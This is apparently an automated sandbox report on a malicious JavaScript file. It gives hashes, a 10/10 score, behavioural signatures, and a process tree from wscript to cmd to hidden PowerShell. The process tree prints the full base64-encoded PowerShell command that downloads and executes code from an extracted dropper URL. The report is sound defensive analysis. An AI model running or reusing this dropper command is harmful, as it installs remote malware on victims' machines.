Overview

overview

10

Static

static

1

0d7beb764e...57d.js

windows7-x64

10

0d7beb764e...57d.js

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    30/12/2023, 03:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0d7beb764ee9f425e8d015e13c60d57d.js

  • Size

    145KB

  • MD5

    0d7beb764ee9f425e8d015e13c60d57d

  • SHA1

    7ad2a1ef9a66f5ce1711ad1bf9f280f2340d414d

  • SHA256

    a76be8cb868c1dc985194d4f0883b17f9c00ed09db6ebf570e8614d09d845079

  • SHA512

    62fdf381b5a905b49d2614bcdec32b198cff3035fe20205fbe67c5b1d3367cedb96241d5b5b59120c3654eaff0b9cf548205d27f44235f6e97714fe9abcfd018

  • SSDEEP

    3072:QxW1aqI8XXazWO14a9Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kVc:HIgqzLCa9Ry9RuXqW4SzUHmLKeMMU7GO

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://smart-integrator.hr/pornhub.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\0d7beb764ee9f425e8d015e13c60d57d.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2404
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2276
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2712

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2712-5-0x000000001B220000-0x000000001B502000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2712-6-0x0000000002490000-0x0000000002498000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2712-7-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2712-8-0x00000000026A0000-0x0000000002720000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2712-9-0x00000000026A0000-0x0000000002720000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2712-10-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2712-11-0x00000000026A0000-0x0000000002720000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2712-12-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2712-13-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

    Filesize

    9.6MB

    Download